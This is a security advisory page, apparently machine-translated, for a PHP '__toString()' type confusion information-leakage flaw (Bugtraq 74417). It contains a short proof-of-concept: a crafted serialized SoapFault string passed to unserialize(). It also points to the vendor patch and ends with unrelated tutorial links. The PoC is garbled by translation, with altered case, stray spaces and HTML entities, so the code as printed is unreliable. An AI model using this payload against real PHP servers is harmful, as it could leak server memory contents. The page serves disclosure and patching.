PHP '_ toString ()' function type obfuscation Information Leakage Vulnerability

PHP '_ toString ()' function type obfuscation Information Leakage Vulnerability
PHP '_ toString ()' function type obfuscation Information Leakage Vulnerability

Release date:
Updated on:

Affected Systems:

PHP PHP

Description:

Bugtraq id: 74417

PHP is a widely used scripting language. It is especially suitable for Web development and can be embedded into HTML.

PHP has a type Obfuscation Vulnerability in the implementation of the '_ toString ()' function. Attackers can exploit this vulnerability to obtain vulnerability information.

<* Source: Taoguang Chen
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Taoguang Chen () provides the following test methods:

& Lt ;? Php
$ Data =
'O: 9: "SoapFault": 4: {s: 9: "faultcode"; I: 4298448493; s: 11: "faultstring"; I: 4298448543; s: 7: "'. "\ 0 * \ 0 ". 'File "; I: 4298447319; s: 7 :"'. "\ 0 * \ 0 ". 'line "; s: 4:" ryat ";}';
Echo unserialize ($ data );
? & Gt;

Suggestion:

Vendor patch:

PHP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.php.net/downloads.php

Install LNMP in CentOS 6.3 (PHP 5.4, MyySQL5.6)

Nginx startup failure occurs during LNMP deployment.

Ubuntu install Nginx php5-fpm MySQL (LNMP environment setup)

Detailed php hd scanning PDF + CD source code + full set of teaching videos

Configure the php lnmp development environment in CentOS 6

PHP details: click here
PHP: click here

This article permanently updates the link address: